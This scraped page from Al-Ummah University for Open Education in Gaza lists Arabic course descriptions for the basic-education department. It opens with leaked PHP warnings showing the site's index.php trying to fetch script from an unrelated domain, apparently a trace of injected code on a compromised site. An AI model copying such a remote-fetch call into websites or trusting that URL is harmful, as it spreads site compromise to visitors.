Warning: file_get_contents(): https:// wrapper is disabled in the server configuration by allow_url_fopen=0 in /home/uouedu/public_html/index.php on line 57

Warning: file_get_contents(https://telurayamorganik.site/js.txt): failed to open stream: no suitable wrapper could be found in /home/uouedu/public_html/index.php on line 57

A PHP Error was encountered

Severity: Warning

Message: session_start(): Cannot send session cookie - headers already sent by (output started at /home/uouedu/public_html/index.php:57)

Filename: Session/Session.php

Line Number: 140

Backtrace:

File: /home/uouedu/public_html/application/controllers/Dashboard.php
Line: 9
Function: __construct

File: /home/uouedu/public_html/index.php
Line: 293
Function: require_once

A PHP Error was encountered

Severity: Warning

Message: session_start(): Cannot send session cache limiter - headers already sent (output started at /home/uouedu/public_html/index.php:57)

Filename: Session/Session.php

Line Number: 140

Backtrace:

File: /home/uouedu/public_html/application/controllers/Dashboard.php
Line: 9
Function: __construct

File: /home/uouedu/public_html/index.php
Line: 293
Function: require_once

جامعة الأمة للتعليم المفتوح-غزة

توصيف المساقات

مساقات التخصص الاجبارية قسم تربية تعليم أساسي

يهدف هذا المساق إلى تعريف الطلبة بالرياضيات وأنماط التفكير التي يمكن تنميتها من خلال تدريس هياكلها الأساسية، وتمكين الطلبة من فعاليات تدريس نظرية المجموعات والعلاقات الرياضية والأعداد بأنواعها والهندسات وكيفية إجراء عمليات التقويم الخاصة بتلك الفعاليات، كما أن التركيز على أدوات البيئة والألعاب بأنواعها يعد مهماً لطلبة هذا المساق، وخاصة استخدام أسلوب المجموعات التعاونية وأسلوب الألعاب في تدريس الرياضيات وأسلوب حل المشكلات والتعليم بالاكتشاف.

التعرف على أھم النصوص الشعریة والنثریة المشتملة على أغراض الأدب العربي ، تحلیلھا لغویاً ، بلاغیاً ، بیان قیمتھا الجمالیة ، إضافة إلى تحلیل نماذج من القرآن الكریم والحدیث الشریف ، تبیان وجوه الفصاحة والإعجاز البلاغي فیھا .

يشمل هذا المساق التعليم الأساسي، مفهومه، أهم تعريفاته، أهدافه، خصائصه، المبادئ الحديثة للتعليم الأساسي، تجارب الدول المتقدمة في التعليم الأساسي، فلسفة التعليم الأساسي في فلسطين، وأهم المعوقات التي تواجهه.

قوانین الحركة والطاقة، قوانین الحرارة وطرق قیاسھا، البصریات الھندسیة، المجموعة الشمسیة، التقویم السنوي للأرض، الكھربیة، الصوتیات، الموائع .

يتم تقديم أنماط الخطوط المختلفة للطالب وخاصة خط النسخ والرقعة والعمل على تنمية قدرات الطلبة في تحسين الخط وخاصة أثناء الكتابة على السبورة.

مقدمة في علم البيئة (النشأة والتطور)، ثم يتعرض للأخطار البيئية الطبيعية والأرض والنظم البيئية الطبيعية، الدورات البيوجيوكيميائية، والتطرق إلى الإنسان وعلاقته بالبيئة والمصادر الطبيعية في نظام الأرض الصلبة، ثم إلى دراسة تلوث الهواء ومصادر المياه وإدارتها وتلوثها والنفايات الصلبة وأنواعها وطرق التخلص منها، وكذلك دراسة العلاقة بين الغذاء والصحة وفي الختام يتعرض لتقييم الأثر البيئي.

أصبح من الضروري أن يكون متمتعاً بكفايات شخصية متكاملة خلاقة، معداً إعداداً جيداً علمياً، وثقافياً، ومهنياً، قادراً على فهم حاجات طلابه، وعلى توجيههم . وإرشادهم لتيسير مشاركتهم الفاعلة وحفزهم للتعلم قادراً على استخدام أفضل طرائق التدريس فاعلية، وأنفع وأيسر الوسائل والأساليب؛ لتقديم مادته التي يقوم بتدريسها، كما أصبح عليه أن يساعد طلابه على الوعي بمشكلات مجتمعاتهم والإسهام في حلها وتعويدهم الانضباط الذاتي، واحترام الغير إضافة لقدرته على تنمية ذاته وتحديد معلوماته؛ ليتمكن من مواجهة المشكلات التدريسية جاء هذا المساق ليحقق في الطلبة مبادئ التدريس.

یتناول المساق دراسة القضایا التالیة:

الطھارة، الوضوء، المسح على الخفین، الجبائر، العصائب، الغسل، التیمم، الصلاة وشروطھا، أركانھا، سننھا، مكروھاتھا، مبطلاتھا، الآذان والإقامة، السجود بأنواعھ، صلاة الجماعة والمسافر، الخوف، الجمعة، النفل، العیدین، الكسوف والخسوف، الاستسقاء، الجنائز.

التصنیف العام للمملكة الحیوانیة والنباتیة ، تركیب ووظیفة الجزیئات الكبیرة (السكریات، الدھون ، البروتینات ، الأحماض النوویة) ، مقدمة في الأیض الغذائي ، تركیب ووظیفة الخلیة الحیوانیة والنباتیة ، الانقسام الخلوي ، عملیات امتصاص وحركة المسار داخل النبات وخارجھ عن طریق عملیة النتح. . (

العملیة الإرشادیة والمبادئ الأخلاقیة للمرشد ، العوامل والقوى التي أثرت على الحركة الإرشادیة وتاریخھا ، أنواع المشكلات التي تواجھ الفرد وتحتاج إلى إرشاده ، نظریات للإرشاد المھني مثل نظریة سوبر ، ورود، وھولاند ، وجینز برج ورفاقھ ، والإرشاد النفسي في الفكر الإسلامي .

يتناول المساق موضوعات التربية المدنية، ومفهومها، ومجالاتها في الأسرة والمدرسة، والمجتمع والأمة، وأنشطتها في المجتمع المدني، وحقوق الإنسان، والحريات المدنية، وغيرها. ويهدف المساق التعرف إلى أهمية تدريس هذا النمط من التربية.

أصل الأعداد، أنظمة العد، المجموعات، العلاقات، الأعداد الطبیعیة ، عدد العناصر، العملیات الثنائیة، جمع وضرب الأعداد الصحیحة، قوانین الشطب، الأعداد الأولیة، تحلیل الأعداد لعواملھ الأولیة، خوارزمیة القسمة ، أكبر قاسم مشترك، أصغر مضاعف مشترك ، علاقة الترتیب على الأعداد الطبیعیة ، القیم المطلقة ، علاقات التطابق ، نظام الأعداد الكسریة ، جمع وضرب الأعداد الكسریة ، الكسور الاعتیادیة ، علاقة الترتیب على الأعداد الكسریة .

دراسة عامة لعصور الأدب العربي المختلفة، دراسة الأجناس الأدبیة، التعرف على أبرز أعلام الأدب العربي شعراً ونثراً، الخصائص العامة لعصور الأدب.

یدرس ھذا المقرر نشأة علم الاجتماع ومصادره الأساسیة ومفاھیم علماء الاجتماع الأساسیة لھذا العلم وعلاقتھ بالعلوم الاجتماعیة الأخرى، ویُفَصِّل الدرس في مؤسس ھذا العلم العلامة ابن خلدون والأسالیب التي انتھجھا لإیجاد ھذا العلم، كما یدرس الظواھر والعلاقات والنظم الاجتماعیة ودورھا في الحیاة الاجتماعیة الیومیة.

يتناول هذا المساق مفهوم التربية الدينية الإسلامية، وأهداف تدريسه بالنسبة لصفوف المرحلة الأساسية الدنيا (الأول، الثاني، الثالث، الرابع) والتخطيط لدروس التربية الإسلامية في هذه الصفوف وأهم الوسائل التعليمية التي يمكن أن يستخدمها معلم الصف لهذا المساق . إضافة إلى طرائق التدريس التي تتمركز حول الطالب في مثل (مسرحية الدروس، الألعاب التعليمية، التعليم التعاوني، التعليم بالقصة).

المبتدأ والخبر، النواسخ، إن وأخواتھا، كان وأخواتھا، المفاعیل، الفاعل، نائب الفاعل، التمییز والحال .

وصف موجز لفن الكتابة والإنشاء ، التعریف بأسالیب الكتابة وقواعد الإملاء وعلامات الترقیم وأصول الخط العربي وأنواعھ .

يسعى هذا المساق لتزويد الطالب بأسس تعليم الدراسات الاجتماعية في التعليم الأساسي ويتضمن تعريفاً للطالب بالدراسات الاجتماعية وأهدافها وعناصر منهجها وإعداد المدرس في الدراسات الاجتماعية وأنواع طرق التدريس وبعض الاتجاهات المعاصرة في طرق تدريس الدراسات الاجتماعية .

الظروف الطبیعیة لفلسطین من حیث الموقع والبیئة والتضاریس والمناخ والمیاه والنبات الطبیعي والتربة، الظروف البشریة من حیث الاستیطان والعمران والسكان، الظروف الاقتصادیة والتركیب الجیوبولتیكي، أھم المشكلات التي تواجھ السكان كمشكلة المیاه وتزاید عدد السكان .

یتضمن ھذا أهمية اللغة وطرق اكتسابها والاستعداد اللغوي والعوامل المؤثرة على اكتساب اللغة، مراحل نمو وتطور اللغة عند الطفل، والعلاقة بين اللغة والتفكير، وتطور النمو العقلي، ونظرية جان بياجيه في النمو العقلي.

يهدف هذا المساق إلى التعرف على مهنة التعليم وطرائقه قديماً وحديثاً، ومعرفة أكثر الأساليب شيوعاً في التدريس، وخصائص اللغة العربية ووظائفها، وطريقة تدريس القراءة والاستماع والنصوص الأدبية والنحو والإملاء والخط العربي.

أقسام الكلمة العربیة والمبني والمعرب بالحركات والحروف ، والفعل بأقسامھ ، ونواصب الفعل المضارع وجوازمھ، وأسلوب الشرط، كما یدرس موضوعات المیزان الصرفي ، والفعل من حیث صحتھ واعتلالھ وإسناده إلى الضمائر وتوكیده بنون التوكید والمشتقات .

الأهداف العامة وخاصة أهداف التربية الفنية، دور الأسرة، ودور المعلم في التربية الفنية ( التعبير الفني )، التخلف الفني وطرق كشفه وعلاجه، الألوان أنواعها وتركيباتها المختلفة، دائرة الألوان، إقامة المعارض، الوسائل التعليمية في التربية الفنية، دروس نموذجية في التربية الفنية.

يهدف هذا المساق إلى تزويد الطلبة بالأهداف الحديثة لتدريس العلوم في المرحلة الأساسية الدنيا وكيفية تنفيذها ومعرفة طبيعة العلم وخصائصه وبنيته وتوظيف طرق التدريس مثل: القصة والمسرحية العلمية والاستقراء والاستنباط لبناء المفاهيم والعروض العملية والدروس العلمية والمتناقضات والمتشابهات وخرائط المفاهيم وتدريس الأنشطة والإبداع.

المفاھیم والمبادئ والنظریات الأساسیة في علم نفس اللعب، قیاس سلوك اللعب ، استخدام اللعب كأداة للتعلم . معنى اللعب وتعریفاتھ المختلفة، نظریات اللعب، علاقة اللعب بالنمو، اللعب الإیھامي، اللعب والتقلید، اللعب الاجتماعي، اللعب والفروق الفردیة، التربیة واللعب، استخدام اللعب في الإرشاد والعلاج، اللعب والترویح عند الطفل المعوق، استخدام الوالدین كأداة تربویة، نماذج من الألعاب ، مواد اللعب وقیمتھا التربویة .

یھدف ھذا المساق إلى دراسة وتعریف لمفھوم الحضارة الإسلامیة، ثم دراسة أسس وخصائص الحضارة العربیة الإسلامیة، والنظم الإسلامیة، مثل:  نظام الخلافة الإمامة، والوزارة، والحجابة، والكتابة، وتدوین الدواوین، والقضاء، والحسبة، والبرید، والبحریة، نشأة الأساطیل الإسلامیة وغیرھا، ویلقى الضوء على نشأة العلوم الإسلامیة، وبدء الحیاة العلمیة، ومظاھر العمران من بناء مدن وطرز العمارة الإسلامیة ، والحیاة الاجتماعیة ، والحیاة الاقتصادیة في الحضارة الإسلامیة، ثم بیان أثر الحضارة العربیة والإسلامیة في الحضارة الأوروبیة .

يشمل هذا المساق مفهوم الوسائل التعليمية من حيث صفاتها، ومقوماتها، ومصادر الوسائل التعليمية، وإنتاج وسائل تعليمية لاستخدامها في التدريس.

یھدف المساق إلى اكتساب الطلبة مھارات نظریة ومعرفیة في استخدام الحاسوب من النواحي التربویة، حیث یقدم المساق مفھوم الخوارزمیة ومخطط الإدخال والإخراج وطرق البحث المختلفة عبر الانترنت بالإضافة إلى استخدام برامج معالجة الصور وإعداد البرامج التربویة المحوسبة وكذلك إعداد الشرائح التعلیمیة.

مفھوم الذرة، المول، الجدول الدورى وخواص العناصر، التفاعلات الكیمیائیة في المحالیل المائیة، تفاعلات الأحماض والقواعد، الأكسدة، الاختزال، التبادل المزدوج، التركیب الإلكتروني للذرة ، الروابط الكیمیائیة ، الأشكال الھندسیة للجزیئات الكیمیائیة ، خواص الغازات وقوانینھا.

تعریف التلاوة ودراسة عنھا، التعریف بالقراءات السبع، مخارج الحروف وصفاتھا، المد والقصر، كیفیة الابتداء والوقوف والختم في التلاوة، الإدغام وأنواعھ، التفخیم والترقیق، أحكام اللامات والراءات، الھمزة، وتاء التأنیث....